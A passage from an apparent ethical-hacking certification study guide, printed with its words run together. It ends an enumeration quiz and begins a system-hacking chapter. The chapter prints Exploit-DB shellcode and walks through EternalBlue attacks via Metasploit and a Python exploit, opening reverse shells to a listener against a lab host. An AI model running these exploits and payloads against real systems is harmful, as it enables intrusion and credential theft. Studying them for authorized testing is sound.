13.WhatversionofSNMPintroducedencryptionanduser-­basedauthentication?A.1B.2C.2cD.314.WhichofthesecouldyouenumerateonaWordPresssiteusingwpscan?A.PluginsB.PostsC.AdministratorsD.Versions15.Whichofthesetoolsallowsyoutocreateyourownenumerationfunctionbasedonportsbeingidentifiedasopen?A.MetasploitB.nmapC.NetcatD.nbtstat16.WhatunderlyingfunctionalityisnecessarytoenableWindowsfilesharing?A.NetworkFileSystemB.CommonInternetFileSystemC.RemoteprocedurecallD.Remotemethodinvocation17.WhatistheIPC$shareusedfor?A.ProcesspipingB.InterprocessconstructionC.RemoteprocessmanagementD.Interprocesscommunication18.WhattooldoesaJavaprogramneedtousetoimplementremoteprocesscommunication?A.JREB.rmicC.rmirD.JDK261262 Chapter6  Enumeration■19.Whichofthesepassesobjectsbetweensystems?A.SunRPCB.SMBC.RMID.nmap20.Ifyouneededtoenumeratedataacrossmultipleservicesandalsostorethedataforretrievallater,whattoolwouldyouuse?A.MetasploitB.nmapC.RMID.PostgresChapter7SystemHackingTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Vulnerabilities✓✓Exploittools✓✓Programminglanguages✓✓Operatingenvironments✓✓Verificationprocedures✓✓TechnicalassessmentmethodsThisiswherewegettowhatmanypeoplethinkiswhat“hacking,”orpenetrationtesting,isallabout.Certainly,systemhackingisanimportantelement,sinceit’swhereyoudemonstratethatthevulnerabilitiesactuallyexist,butit’snot theonlyone.Penetrationtesting,orethicalhacking,isn’tjustaboutbreakingintosystems—­lootingandpillaging.Keepinmindthattheobjectiveisalwaystohelporganizationsimprovetheirsecurityposture.Exploitingvulnerabilitiestogainaccesstosystemsisonewayofdoingthat.Breakingintoasystemdemonstratestheexistenceofthevulnerability,anditalsoprovidespotentialpathwaystoothersystems.Withtheendgoalinmind,andwiththelistofvulnerabilitiesinplace,wecanstartlookingforexploits.Thereareahandfulofwaystodothat,somemoreeffectivethanothers.Onemethodcanbedonedirectlyonthesystemfromwhichyouarerunningyourtests.Locatingtheexploitsisessentialtobeingabletorunthemagainstyourtargetsystemstogainaccess.Onceyougainaccess,youmoveontopost-­exploitationactivities.You’llwanttograbpasswordsandattempttocrackthosepasswords.Thisdoestwothings.First,itdemonstratesthattherearepasswordsthatcanbecracked—­strongpasswordsshouldn’tbecrackablewithouttakinganimmenseamountoftimeandcomputingresources.Ifyoucaneasilycrackapassword,itisn’tstrongenoughandshouldbechanged.Second,usernamesandpasswordsarecredentialsyoucanuseonothersystems.Justgettingintoasystemmaynotgetyoumuch.Whenyourunanexploit,youonlyhavethepermissionsthathavebeenprovidedtotheusertheserviceisrunningas.Typically,thisisareducedsetofpermissions.Asaresult,youmaynotbeabletodomuchofanything.Atleast,youmaynotbeabletodomuchofanythingwithoutgainingahigherlevelofprivileges.Thismeansyouneedalocalvulnerability,onethatexistsinsoftwarethatcanbeaccessedorrunonlywhenyouareloggedintothesystem.Runningtheseprivilegeescalations,iftheyaresuccessful,willgainyouanotherlevelofinformationandaccessthatyoucanmakeuseof.Attackerswillgenerallytrytoobscuretheirexistenceinasystem.Ifyouarereallyworkinginared-­teamcapacity,wheretheoperationsteamsatyourtargetarebeingtestedfortheirabilitytodetectandrespond,youtoowillwanttocoveryourtracks.Thereareseveralstepsyoumaywanttotaketohideyourexistence.Thismaybeespeciallytrueifthereisevidenceofyourinitialinfiltrationofthesystem.Thischapter,perhapsmorethanothers,coversarangeoftechniquesthatarejustthestartingpoint.Therearetoomanytoolsthatareregularlyusedthancanbecoveredhere.Systemexploitationisnotascience,either.Youcan’tjustreadasetofinstructionsonhowtoreliablybreakintoasystem.Itisanart.ItrequiresalotoftimeworkingnotonlywithSearchingfor Exploits 265toolsbutalsounderstandingvulnerabilitiesandhowtheymaybeexploited.Itoftenrequiresareasonableunderstandingofsystemadministration,meaningyouneedtoknowhowtooperatethesystemsyouaretryingtobreakinto.Whilethisaspectofethicalhackingisoftenthoughtofasthemostfun,itrequiresalotoftimeandefforttodowell,andit’snotnecessarilythemostimportantaspect.WhenitcomestotheMITREATT&CKFramework,thetechniquescoveredinthischapterfallunderExecutionandPersistence.Betweenthosetwophasesare28techniques.Mostofthose,18,fallunderPersistence.Thisdemonstratestheideathatthereisalottocoverhere,andwecan’tcovereverything.Itreallyrequiresalotofworkandexploration,thoughwe’llcoverthefoundations.Ifthisiswhatyouwanttodoforajob,youwillneedtoputinalotoftimetoreallyunderstandallofthesetoolsandtechniques.Searchingfor ExploitsYou’vedoneyourenumerationandyourscanningtoidentifyvulnerabilities,soyouhavealistofvulnerabilitiesthatseempromising.Youneedwaysofexploitingthevulnerabilities,andevenifyoucould,youjustdon’thavethetimetowriteexploitsyourself.Youmayaswelltakeadvantageoftheworkofotherstogetexploitssoyoucanclearlydemonstratethevulnerability.That’soneoftheprimaryreasonsforrunningtheexploitafterall.Youneedtodemonstratethatavulnerabilityisexploitableforwhenyoureporttoyourcustomer/employer.Anotherreasontoruntheexploitistogainanadditionallayersoyoucanpivottoothernetworkstolookformorevulnerabilities.Partofbeinganethicalhackerismakingsureyouhavepermissionandarenotdoinganyharm.However,theobjectiveofanyethicalhackershouldbetoimprovesecurity.Thisisanimportantpoint.Gettingintoacustomer’snetworktotakedownasmanysystemsasyoucanjusttohavedoneitwithoutanypathforthecustomertoimprovetheirsecuritypostureisn’tveryethical.Keepinmindthatyourgoalisalwaystoimprovesecurityandnotjusttoseehowmuchdamageyoucancause.Youmaybewonderingwhereyoucouldpossiblyfindalotofexploits.Onegreatresourceiswww.exploit-­db.com.Thisisasitewhereresearchersanddeveloperspostexploitcodeandproof-­of-­conceptcodethatworksagainstidentifiedvulnerabilities.WhileoftentheseexploitsmaketheirwayintotoolslikeMetasploit,theydon’talways.Thismayespeciallybetrueiftheexploitisjustaproofofconceptthat’snotfullyimplementedandmaynottaketheexploittotheend.IfyoutakealookatFigure 7.1,youcanseealistofthecodeforcurrentexploits.Whatyouseeisjustalistofremoteexploits.Infairness,notalloftheseareexploitsinthewayyoumaythinkaboutexploits,ifyouarethinkingofexploitsassomethingthatgivesyouashell.Atthetopofthelist,forexample,youwillseealinktoaPythonscriptthatenumeratesusernamesonanOpenSSH7.7 installation.266 Chapter7  SystemHacking■FIGURE 7.1 RemoteExploitslistatwww.exploit-­db.comWhatyouseeisjustasinglecategoryofexploits.You’llalsoseewebapplicationexploits,denial-­of-­serviceexploits,andlocalexploits,whichincludeprivilegeescalationexploits.Whiletheremoteexploitsmayseemsexier—­afterall,whodoesn’tlovetopopabox?—­thereissomuchmoretoexploitingsystemsthanjustgettinginremotely.Infact,thereareoftenfareasierwaystoinfiltrateanetwork.Atthetimeofthiswriting,therearenearly44,000exploitsthathavebeenarchivedatwww.exploit-­db.com.MuchofwhatyouwillfindherearescriptswritteninlanguageslikePython.IfyouknowPython,youcanreadthem.Whatevertheexploitiswrittenin,makesureyouaretestingitinasafeplaceaheadoftime.Thiswillgiveyouaclearunderstandingofwhatitisdoingandtheimpactitislikelytohave.Theremaybeaneasierwaytogettotheexploitsratherthanopeningabrowserandgoingthroughthewebsite.KaliLinuxhastherepositoryofexploitsavailable,aswellasatoolthatcanbeusedtosearchtherepositoryfromthecommandline.Youdon’thavetobelimitedtojustKali,though.TheentirerepositoryisaGitrepositorythatcanbeclonedandusedanywhere.Asanexample,runningArchStrikeoverthetopofManjaroLinux,thereisapackagefortheexploitdbrepository,soyoudon’thavetoberunningKali.Thereareotherdistributionsthatincludethispackage.YoucouldalsojustclonetheirGitrepository.It’snotjusttherepositoryyouget,though.Ifthatwerethecase,you’dhavetofindawaytolocatetheexploityou’relookingfor.Instead,thereisashellscriptthatwilllocatefilesincludedintherepositorythatmatchyoursearchparameters.Asanexample,inthefollowingcodelisting,youcanseeasearchforOpenSSHexploits.ThiswasinspiredbythecurrentOpenSSHenumerationvulnerability.Theprogramusedissearchsploit.Youcansearchforkeywords,asshown,oryoucanspecifywhereyouarelookingforthekeyword,suchasinthetitle.Youmayalsodoacase-­sensitivesearchordoanexactmatchsearch.Itwillalldependonwhatyouknowaboutwhatyouarelookingfor.Searchingfor Exploits 267FindingExploitswithsearchsploit[email protected]$searchsploitopenssh-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­------------­ExploitTitle|Path|(/usr/share/exploitdb-­git/)-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­­-­------------­-­DebianOpenSSH-­(Authenticated)R|exploits/linux/remote/6094.txtDropbear/OpenSSHServer-­'MAX_U|exploits/multiple/dos/1572.plFreeBSDOpenSSH3.5p1-­RemoteCom|exploits/freebsd/remote/17462.txtNovellNetware6.5-­OpenSSHRemot|exploits/novell/dos/14866.txtOpenSSH1.2-­'.scp'FileCreate/O|exploits/linux/remote/20253.shOpenSSH2.x/3.0.1/3.0.2-­Channel|exploits/unix/remote/21314.txtOpenSSH2.x/3.x-­Kerberos4TGT/A|exploits/linux/remote/21402.txtOpenSSH3.x-­Challenge-­ResponseB|exploits/unix/remote/21578.txtOpenSSH3.x-­Challenge-­ResponseB|exploits/unix/remote/21579.txtOpenSSH4.3p1-­DuplicatedBlock|exploits/multiple/dos/2444.shOpenSSH6.8<6.9-­'PTY'LocalPr|exploits/linux/local/41173.cOpenSSH7.2-­DenialofService|exploits/linux/dos/40888.pyOpenSSH7.2p1-­(Authenticated)xa|exploits/multiple/remote/39569.pyOpenSSH7.2p2-­UsernameEnumerati|exploits/linux/remote/40136.pyOpenSSH<6.6SFTP(x64)-­Command|exploits/linux_x86-­64/remote/45000.cOpenSSH<6.6SFTP-­CommandExecu|exploits/linux/remote/45001.pyOpenSSH<7.4-­'UsePrivilegeSepar|exploits/linux/local/40962.txtOpenSSH<7.4-­agentProtocolArb|exploits/linux/remote/40963.txtOpenSSH/PAM3.6.1p1-­'gossh.sh'R|exploits/linux/remote/26.shOpenSSH/PAM3.6.1p1-­RemoteUsers|exploits/linux/remote/25.cOpenSSHd7.2p2-­UsernameEnumerat|exploits/linux/remote/40113.txtPortableOpenSSH3.6.1p-­PAM/4.1-­Su|exploits/multiple/remote/3303.shglibc-­2.2/openssh-­2.3.0p1/glib|exploits/linux/local/258.sh-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­------------­-­-­-­Shellcodes:NoResultTherepositoryisbrokenintoexploitsandshellcodes.Theshellcodesarewhatyouplaceintooverallexploitcodethatwillprovideyouwithshellaccessonthetargetsystem.Therestisaboutdeliveryandgettingtheshellcodeintotherightplace.Shellcodeiscommonlyhexadecimalrepresentationsofassemblylanguageoperationcodes(opcodes),thoughhereyoumayalsofindfilesthatjustcontaintheassemblylanguagecode,whichwouldneedtobe268 Chapter7  SystemHacking■convertedtoopcodes.Alloftheshellcodesintherepositoryarecategorizedbytheoperatingsystemandprocessortype.Asanexample,thereisadirectorynamedwindows_x86-­64intherepository.ThefollowingcodelistingisanexampleofaCprogramthatisincludedinthatdirectory.Therearenocommentsaboutexactlywhatitdoes.RunningsearchsploitagainstthefilenamerevealsthatittargetstheWindows7operatingsystembutnothingbeyondthat.Interestingly,asasidenote,compilingitandrunningitonaLinuxsystemgeneratestheerrorthatstacksmashingwasdetected,andtheprogramcrashes.Shellcodefrom theExploit-­DBRepository#includecharshellcode[]="\x31\xC9"//xorecx,ecx"\x64\x8B\x71\x30"//movesi,[fs:ecx+0x30]"\x8B\x76\x0C"//movesi,[esi+0x0C]"\x8B\x76\x1C"//movesi,[esi+0x1c]"\x8B\x06"//moveax,[esi]"\x8B\x68\x08"//movebp,[eax+0x08]"\x68\x11\x11\x11\x11"//push0x11111111"\x66\x68\x11\x11"//pushword0x1111"\x5B"//popebx"\x53"//pushebx"\x55"//pushebp"\x5B"//popebx"\x66\x81\xC3\x4B\x85"//addbx,0x854b"\xFF\xD3"//callebx"\xEB\xEA";//jmpshortintmain(intargc,char**argv){int*ret;ret=(int*)&ret+2;(*ret)=(int)shellcode;}Thewebsitewww.exploit-­db.comisnottheonlyplacetolookforexploits,butitisconvenient.It’salsoprobablythebestlegitimatesiteavailable,andthefactthatitcomeswithasearchtoolmakesithandy.Ifyouwanttolearnalotaboutexploitsandhowtheyaredeveloped,thisisagreatplacetogo.SystemCompromise 269Youdon’thavetolimityourselftojustwebsites,though.Therearemailinglistswhereannouncementsofvulnerabilitiesaremade.Sometimes,alongwiththevulnerabilityannouncement,youwillgetproof-­of-­conceptcode.Howfaryoucangetwiththecodedependsentirelyontheresearcher,thevulnerability,andthesoftware.Sometimes,whatyou’llgetisjustademonstrationthatthevulnerabilitycanbetriggered,butyoumaynotgetanyfurtheraccesstotheremotesystemthanyouhadbefore.Therearecertainlyotherplacesyoucangotolookforexploits.However,youstartskirtingtheedgesofethics.Theso-­calleddarkweb,ordarknet,isoneplaceyoucansearchforexploits.IfyouhaveaTorbrowserorjustthesoftwarethatcreatesaproxyserveryoucanusetoconnectanybrowserto,youcanstartsearchingforsiteswhereyoucanobtainsomeofthiscode.Thereareanumberofsearchenginesthatyoucanusethataremorelikelytofindsomeofthesedarkersites,suchasNotEvil.Thereareconsiderationstokeepinmind,though.OneisthatsitescancomeandgoontheTornetwork.EvenifNotEvilturnsuplinksinasearch,youaren’tguaranteedtofindthesiteupandfunctional.IndiggingaroundinTorwhilewritingthis,Ifoundthatseveralsitessimplydidn’trespond.Second,youdon’tknowthesourceoftheexploityoufind.Therearetwoelementshere.Oneisthatitmayhavebeenobtainedordevelopedillegally.ThiscrossestheethicalboundariesyouarerequiredtoadheretoasaCertifiedEthicalHacker.Perhapsmoreimportant,though,unlessyouarereallygoodatreadingsourcecode,evenifthesourcecodeisobfuscated,isthatyoumayfindthatyouareworkingwithinfectedsoftwarethatcouldcompromiseyouandyourtargetinwaysyoudidn’texpect.Thisiswhyit’ssoimportanttoworkwithlegitimateandprofessionalsitesandresearchers.Finally,Torismeantasaplaceforanonymity.Thisincludesnotonlytheuserswhoarevisitingthesitesbutalsothesitesthemselves.Itwillbetime-­consumingtolearnwhereeverythingislocated.It’salsoaplaceforillicitcommerce.YoumayfindsomeexploitsontheTornetwork,butmorethanlikelyifyoudo,theywillbeforsaleratherthanjustofferedupforthegoodofthecommunity.SystemCompromiseExploitation,orsystemcompromise,willservetwopurposesforus.Oneofthemistodemonstratethatvulnerabilitiesarelegitimateandnotjusttheoretical.Afterall,whenwedovulnerabilityscanning,wegetanindicationthatasystemmayhaveavulnerability,butuntilthevulnerabilityhasbeenexploited,it’snotguaranteedthatthevulnerabilityexists,whichmeanswearen’tsurewhetheritreallyneedstobefixed.Thesecondreasonisthatexploitingavulnerabilityandcompromisingasystemcanleadusfurtherintotheorganization,potentiallyexposingadditionalvulnerabilities.Thisis,inpart,becausewemaygetfurtherreachabilitydeeperintothenetworkbutalsobecausewemaybeabletoharvestcredentialsthatmaybeusedonothersystems.I’mgoingtocoveracoupleofdifferentwaystoworkonsystemcompromise.I’mgoingtostartwithMetasploitsinceit’ssuchacommonapproach.Itshouldbenotedthat270 Chapter7  SystemHacking■Metasploitisnottheonlyexploitframeworkavailable.ThereareothercommercialsoftwareofferingsthatwilldothesamethingasMetasploit.Metasploitdoeshaveacommercialoffering,andifyouareusingitforbusinesspurposes,youshouldbepayingforthecommerciallicense;thereisacommunityeditionaswell.Ontopofthat,youcangetacopyofKaliLinux,whichhasMetasploitpreinstalled.OthersoftwarepackageswilldoroughlythesamethingasMetasploit,andyoushouldtakealookatthemtoseewhatyoumaypreferinabusinesssetting.WecanalsoreturntoExploit-­DBforsomeadditionalexploitationpossibilities.Onceyouhavealistofyourvulnerabilities,youcansearchtheexploitdatabaseforactualexploitsthatcanbeused.Iwillcoveridentifyingthemodulesandthenmakinguseofthem.Insomecases,asyouwillsee,it’snotalwaysacaseofrunningasinglescript.MetasploitModulesIfthereisaknownexploitforavulnerabilityavailable,ithaslikelyfounditswayintoMetasploit.Thisisaprogramthatwasoriginallydevelopedasanexploitframework.Theideawastoprovidebuildingblockssoexploitscouldquicklybedevelopedbyputtingtogetherasetofprogrammingmodulesthatcouldbeused.Additionally,shellcodesandencodersareavailabletoputintoexploitsbeingdeveloped.Whileitmayhavestartedoffasanexploitframeworktargetingsecurityresearcherswhoidentifyvulnerabilitiessotheycaneasilycreateexploits,ithasbecomeago-­totoolforpenetrationandsecuritytesters.Oneofthereasonsisthelargenumberofmodulesavailablethatcanbeusedwhiletestingsystemsandnetworks.AlmosttheentirelifecycleofapenetrationtestcanbehandledwithinMetasploit.Asofthemomentofthiswriting,therearemorethan1,000auxiliarymodules,manyofwhicharescannersthatcanbeusedforreconnaissanceandenumeration.Usingthesemodules,youcanlearnwhatthenetworklookslikeandwhatservicesareavailable.YoucanalsoimportvulnerabilityscansfromOpenVAS,Nessus,and,ofcourse,Nexpose,whichisdevelopedbythesamecompanythatisresponsibleforMetasploit.Onceyouhaveallofthisinformation,though,youwanttomovetoexploitation.Therearecurrently1,800exploitmodulesinMetasploit,thoughthenumberchangesfairlyregularlybecauseofthepopularityofthesoftwareandthedevelopmentworkbyRapid7.Metasploitmakestheworkofexploitingconsiderablyeasierthangoingthroughtheprocessofcreatinganexploitbyhand,assumingMetasploithasanexploitavailable.Iftheydon’t,you’llbeforcedtodoonebyhandifyoucan.We’regoingtousethecommandlineforthis,thoughthereareotheroptions,likeawebinterfaceifyougetthepackagefromRapid7.TheCLIexposeseverythingthat’shappening.We’regoingtostartwiththemsfconsoleprogram.TherearemultiplewaysofacquiringMetasploit,butforthis,I’mjustusinganinstanceofKaliLinux,whichhasMetasploitinstalledbydefault.AllIneededtodowassetupthedatabasethatisusedtostoreinformationabouthosts,vulnerabilities,andanylootacquired.Inthefollowinglisting,youcanseestartingupmsfconsole,whichisthecommand-­lineprogramusedtointeractwithMetasploit.SystemCompromise 271Startingmsfconsole[email protected]:~#msfconsole...dBBBBBBbdBBBPdBBBBBBPdBBBBBb'dB'BBPdB'dB'dB'dBBPdBPdBPBBdB'dB'dB'dBPdBPdBPBBdB'dB'dB'dBBBBPdBPdBBBBBBB.odBBBBBPdBBBBBbdBPdBBBBPdBPdBBBBBBP.dB'dBPdB'.BP|dBPdBBBB'dBPdB'.BPdBPdBP-­-­o-­-­dBPdBPdBPdB'.BPdBPdBP|dBBBBPdBPdBBBBPdBBBBPdBPdBP...o=[+-­-­-­-­=[+-­-­-­-­=[+-­-­-­-­=[Toboldlygowherenoshellhasgonebeforemetasploitv4.17.8-­dev1803exploits-­1027auxiliary-­311post538payloads-­41encoders-­10nopsFreeMetasploitProtrial:http://r-­7.co/trymsp]]]]msf>Oncemsfconsoleisstarted,weneedtolocateanexploitforavulnerabilitythathasbeenidentified.ThereisaWindowsServeronmyhomenetworkthatI’mgoingtouseforthepurposeofdemonstratingexploitation.ThisisaMetasploitable 3 instance,sothereareseveralvulnerableservicesthathavebeenbuiltintoit,makingitperfecttodemonstratewithandpracticeon.Tofindanexploit,wecansearchforit.You’llseeinthefollowing272 Chapter7  SystemHacking■listingasearchforamodulethatwillruntheEternalBlueexploit,whichtakesadvantageofthevulnerabilitydescribedinCVE-­2017-­0144.Thereareseveralmatchesforthissearch.Wecouldnarrowthescopewithsomeadditionalparameters,likespecifyingthetypeusingtype:exploit,forexample.Thismaybeusefulifyouhavealonglistofresultsandyouneedtomakeiteasiertoidentifytherightone.SearchingMetasploitmsf>searcheternalblueMatchingModules================NameDisclosureDate-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­2017-­03-­14MS17-­010auxiliary/admin/smb/ms17_010_commandRanknormalDescriptionEternalRomance/EternalSynergy/EternalChampionSMBRemoteWindowsCommandExecutionauxiliary/scanner/smb/smb_ms17_010DetectionnormalMS17-­010SMBRCE2017-­03-­14averageMS17-­010EternalBlueexploit/windows/smb/ms17_010_eternalblue_win82017-­03-­14SMBRemoteWindowsKernelPoolCorruptionforWin8+averageMS17-­010EternalBlueexploit/windows/smb/ms17_010_eternalblueSMBRemoteWindowsKernelPoolCorruptionexploit/windows/smb/ms17_010_psexec2017-­03-­14normalMS17-­010EternalRomance/EternalSynergy/EternalChampionSMBRemoteWindowsCodeExecutionThereismorethanonethatwecouldusehere,dependingonwhatwewanttoaccomplish.Inthiscase,Iwanttogetashellontheremotesystem;theauxiliarymodulewillallowustoexecuteasinglecommandontheremotesystem,whichwouldbethesameastheoneendinginpsexec.Asaresult,we’regoingtousetheexploitendingin010_eternalblue,asyoucanseeinthenextcodelisting.Thiswillgiveusashellontheremotehost.Fromthatshell,wecanstartissuingcommands,butmorethanjustone,whichtheotherswouldletusdo.Onceweknowwhatmoduleweareusing,weloaditupusingtheusecommandinmsfconsole.Eachmodulehasasetofoptionsthatcanorneedstobeset.Insomecases,theoptionswillhavedefaultsalreadysetsoyoudon’tneedtodoanything.Theoneparameterthatwillalwaysneedtobesetistheoneforthetarget.ThiswillbeeitherRHOSTorRHOSTS,dependingonwhetherthemoduleexpectstohavemultipletargets.Ascannermodule,forexample,willuseRHOSTS,whileanexploitmodulewillgenerallyhaveRHOSTasSystemCompromise 273theparametername.Inthefollowingcodelisting,weneedtosetRHOSTwiththeIPaddressofthetargetofourexploitattempt.Asexpected,theexploitwassuccessful,givingusremoteaccesstothetargetsystem.EternalBlueExploitmsf>useexploit/windows/smb/ms17_010_eternalbluemsfexploit(windows/smb/ms17_010_eternalblue)>setRHOST192.168.86.24RHOST=>192.168.86.24msfexploit(windows/smb/ms17_010_eternalblue)>exploit[*]StartedreverseTCPhandleron192.168.86.57:4444[*]192.168.86.24:445-­Connectingtotargetforexploitation.[+]192.168.86.24:445-­Connectionestablishedforexploitation.[+]192.168.86.24:445-­TargetOSselectedvalidforOSindicatedbySMBreply[*]192.168.86.24:445-­CORErawbufferdump(51bytes)[*]192.168.86.24:445-­0x0000000057696e646f7773205365727665722032WindowsServer2[*]192.168.86.24:445-­0x00000010303038205232205374616e6461726420008R2Standard[*]192.168.86.24:445-­0x00000020373630312053657276696365205061637601ServicePac[*]192.168.86.24:445-­0x000000306b2031k1[+]192.168.86.24:445-­TargetarchselectedvalidforarchindicatedbyDCE/RPCreply[*]192.168.86.24:445-­Tryingexploitwith12GroomAllocations.[*]192.168.86.24:445-­Sendingallbutlastfragmentofexploitpacket[*]192.168.86.24:445-­Startingnon-­pagedpoolgrooming[+]192.168.86.24:445-­SendingSMBv2buffers[+]192.168.86.24:445-­ClosingSMBv1connectioncreatingfreeholeadjacenttoSMBv2buffer.[*]192.168.86.24:445-­SendingfinalSMBv2buffers.[*]192.168.86.24:445-­Sendinglastfragmentofexploitpacket![*]192.168.86.24:445-­Receivingresponsefromexploitpacket[+]192.168.86.24:445-­ETERNALBLUEoverwritecompletedsuccessfully(0xC000000D)!274 Chapter7  SystemHacking■[*]192.168.86.24:445-­Sendingeggtocorruptedconnection.[*]192.168.86.24:445-­Triggeringfreeofcorruptedbuffer.[*]Commandshellsession1opened(192.168.86.57:4444-­>192.168.86.24:50371)at2021-­01-­0919:52:40-­0600[+]192.168.86.24:445-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=[+]192.168.86.24:445-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­WIN-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=[+]192.168.86.24:445-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=-­=Noteveryvulnerabilityisassuccessfulasthisone.Whenyousearchforamodule,youwillgetarankingthatindicatestoyouhowsuccessfultheexploitislikelytobe.Vulnerabilitiesarenotalwaysstraightforward.Insomecases,theremaybedependenciesthatneedtobeinplacebeforethevulnerabilitycanbeexploited.Youmayneedtotrytheexploitmultipletimesbeforeitsucceeds.Ifitwereeasyandstraightforwardafterall,everyonewouldbeabletodoit,whichmightmeanmoresecuritytestingwasgettingdone,whichinturnmayleadtofewerbugsinsoftware.Exploit-­DBYoucansearchwww.exploit-­db.comforexploitsassociatedwithvulnerabilities.Forexample,wewereworkingwiththeEternalBlueexploit,whichweknowhasamoduleinMetasploit.Wecansearchwww.exploit-­db.comformodulesthatrelatetotheEternalBluevulnerability.InFigure 7.2,youcanseetheresultsofthatsearch.ThisshowsthreeresultsthatfallintoWindows-­relatedcategories.Theseareallproof-­of-­conceptPythonscriptsthatyoucandownloadandrun.FIGURE 7.2 Exploit-­DBsearchresultsIfyouhavetheExploit-­DBpackageinstalledonyoursystem,meaningyouhavesearchsploittouse,youcouldjustrunsearchsploittodothesamesearch.TheExploit-­DBrepositoryincludesexploitsandshellcodes,sotheresultsdon’tincludepapersliketheonesyougetfromthewebsite.Instead,youjustgetthelistofexploitcode.Additionally,youarenotrequiredtodownloadorlookatthecodeinawebbrowserbecauseSystemCompromise 275youhavethecodedownloadedalready.Inthefollowingcodelisting,youcanseetheresultsofthesearch.Whatwegetisthelistofthreeexploitprogramsbutnoshellcoderesults.Thisisn’tespeciallysurprisingbecausethereisnoshellcodeespeciallyassociatedwithEternalBlue.Instead,it’sjustavulnerabilityintheimplementationoftheServerMessageBlock(SMB)protocol.searchsploitResultsfor EternalBlue[email protected]:~#searchsploit"eternalblue"-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-----------­-­-­-­ExploitTitle|Path|(/usr/share/exploitdb/)-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-----------­-­-­-­MicrosoftWindowsWindows7/2008R2(x|exploits/windows_x86-­64/remote/42031.pyMicrosoftWindowsWindows7/8.1/2008R|exploits/windows/remote/42315.pyMicrosoftWindowsWindows8/8.1/2012R|exploits/windows_x86-­64/remote/42030.py-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-----------­-­-­­-­Shellcodes:NoResultYoucanrunthisexploitfromwhereitisorcopyittoyourhomedirectoryandrunitfromthere.ThiswillsaveyoufrompassinginthepathtothePythonscriptwhenyourunit.Itwillalsoallowyoutomakechanges,ifyouwantedtoexperiment,whileleavingthefunctionalexploitcodeintactwhereitis.Inthenextcodelisting,youwillseearunof42031.py,attackingthesamesystemwedidfromMetasploit.Thelastparameteronthecommandlineisexecutablecodeinthefilenamedpayload.Thisisacombinationoftwoseparatepiecesofexecutablecode.ThefirstisshellcodewrittenbytheauthorofthePythonexploit.Attheendofthatisastubprogramthatsendsaconnectionbacktoasystemlisteningforit.Anexploitisthemeansforanexternalentitytocauseaprogramtofailinawaythatallowstheattackertocontroltheflowoftheprogram’sexecution.Justcausingtheprogramtofail,though,isn’tenough.Youneedsomecodeofyourownfortheprogramtoexecuteonyourbehalf.Thisistheshellcode,socalledbecauseittypicallyprovidesashelltotheattacker.Thismeanstheattackerhasawaytointeractwiththeoperatingsystemdirectly.Exploitof EternalBluefrom PythonScript[email protected]:~#python42031.py192.168.86.24payloadshellcodesize:1262numGroomConn:13TargetOS:WindowsServer2008R2Standard7601ServicePack1276 Chapter7  SystemHacking■SMB1sessionsetupallocatenonpagedpoolsuccessSMB1sessionsetupallocatenonpagedpoolsuccessgoodresponsestatus:INVALID_PARAMETERdoneThisisonlyhalfoftheattack.Whatyouseehereistheexploitrunningsuccessfully,triggeringthevulnerabilityandgettingtheremoteservicetoexecutetheshellcodeprovided.Theshellcodehereisanexecutablefilecreatedfromassemblylanguagecode.ItincludesaMeterpretershellandawaytoconnectbacktothesystemithasbeenconfiguredtocallbackto.Thisrequiresthatyoualsohavealistenersetup.Wegobacktomsfconsoleagainforthis.Inthefollowinglisting,youcanseeloadingthelistenermoduleandsettingthelisteningportandIPaddress.Whentheexploitrunsonthetarget,youwillalsoseetheconnectiontothelistener.ExploitHandlermsf>useexploit/multi/handlermsfexploit(multi/handler)>setLHOST192.168.86.57LHOST=>192.168.86.57msfexploit(multi/handler)>setLPORT4444LPORT=>4444msfexploit(multi/handler)>exploitThisgivesustheabilitytointeractwiththeremotesystemusingMeterpreter,whichisanoperatingsystem–agnosticshelllanguage.Ithasanumberofcommandsthatcanberunagainstthetargetsystemregardlessofwhatoperatingsystemthetargetsystemhas.Meterpretertranslatesthecommandspassedtoitintoonesthatarespecifictotheunderlyingoperatingsystem.Thiscanincludelistingfiles,changingdirectories,uploadingfiles,andgatheringsysteminformationlikepasswords.GatheringPasswordsOnceyouhaveanexploitedsystem,youwillwanttostartgatheringinformationonit.Onetypeofinformationisthepasswordsonthesystem.Thereareacoupleofwaystogatherthesepasswords.Intheprecedingcodelisting,wegotaMeterpretershellonatar